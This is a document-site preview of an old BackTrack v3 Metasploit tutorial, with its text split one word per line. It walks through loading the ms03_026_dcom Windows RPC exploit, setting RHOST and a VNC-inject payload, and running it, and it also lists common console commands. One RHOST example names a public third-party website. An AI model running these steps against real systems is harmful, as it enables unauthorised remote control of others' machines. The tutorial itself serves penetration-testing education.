Metasploit.Backtrackv3

Metasploit.Backtrackv3 -...

Info iconThis preview shows page 1. Sign up to view the full content.

View Full Document Right Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: A
Simple
Metaspolit
Example

 1. Startup
Backtrack
v3
and
login
 2. Startup
X‐Windows
 a. In
the
terminal
type
 startx
 3. Startup
konsole
 a. Right
click
the
desktop
 b. Select
Run
Command
 c. Type
konsole

and
press
ENTER
 4. Change
to
the
directory
msf3
 a. In
the
konsole
type

 cd
/msf3
 5. Startup
the
Metasploit
console
 a. In
the
konsole
type

 ./msfconsole
 6. Load
up
the
windows/dcerpc/ms03_026_dcom
exploit
 a. In
the
Metasploit
console
type

 use
windows/dcerpc/ms03_026_dcom
 7. Look
at
the
options
available
to
the
exploit
 a. In
the
Metasploit
console
type
 show
options
 8. Set
the
RHOST
variable
to
be
the
target
of
the
vulnerable
machine
 a. In
the
Metasploit
console
type
 set
RHOST
target
 i. The
target
should
be
an
IP
address
or
a
resolvable
name

 i.e
192.168.1.100,
www.google.com
 9. Load
up
a
payload
that
we
wish
to
execute
once
the
exploit
has
worked
 a. In
the
Metasploit
console
type
 set
PAYLOAD
windows/vncinject/bind_tcp
 10. Execute
the
exploit
 a. In
Metasploit
console
type
 exploit
 Update
Metasploit
in
Backtrack
v3
 1. Goto
the
Metasploit
directory
 a. In
the
terminal/konsole
type
 cd
/msf3
 2. Update
Metasploit
 a. In
the
terminal/konsole
type
 svn
update
 Searching
Exploits
From
the
Command
Line
in
Backtrack
v3
 1. Goto
the
Metasploit
directory
 a. In
the
terminal/konsole
type
 cd
/msf3
 2. Search
the
Metasploit
database
using
grep
 a. In
the
terminal/konsole
type
 ./msfcli
|
grep
expression
 i. expression
should
be
the
word
you
are
searching
for
 i.e.
windows,
iis,
apache,
linux
 ii. expression
is
case
sensitive
 
 Starting
the
Metasploit
GUI
in
Backtrack
v3
 1. Startup
Backtrack
v3
and
login
 2. Startup
X‐Windows
 a. In
the
terminal
type
 startx
 3. Startup
konsole
 a. Right
click
the
desktop
 b. Select
Run
Command
 c. Type
konsole

and
press
ENTER
 4. Change
to
the
directory
msf3
 a. In
the
konsole
type

 cd
/msf3
 5. Startup
the
Metasploit
console
 a. In
the
konsole
type
 ./msfgui
 Common
Metaspoit
Console
Commands
 • use
exploit
 o This
will
set
the
exploit
you
wish
to
use.


 i.e
windows/dcerpc/ms03_026_dcom
 You
can
search
for
some
possible
exploits
with
 ./msfcli
|
grep
expression

 show
options
 o This
will
show
the
variables
that
may
need
to
be
set
or
change.
 One
common
variable
you
need
to
set
is
RHOST
 set
VARIABLE
VALUE
 o This
will
set
the
variable’s
value
 One
common
variable
you
need
to
set
is
RHOST
 i.e.
set
RHOST
192.168.1.1

 • • • • • show
payloads
 o Shows
the
various
payloads
that
are
available
 Keep
in
mind
the
target’s
operating
system
will
limit
the
 payload
you
may
be
able
to
use
 set
PAYLOAD
payload
 o Set
the
payload
you
wish
to
use
against
the
target
 i.e.
set
PAYLOAD
windows/vncinject/bind_tcp
 exploit
 o Execute
the
exploit
 ...
View Full Document

Ask a homework question - tutors are online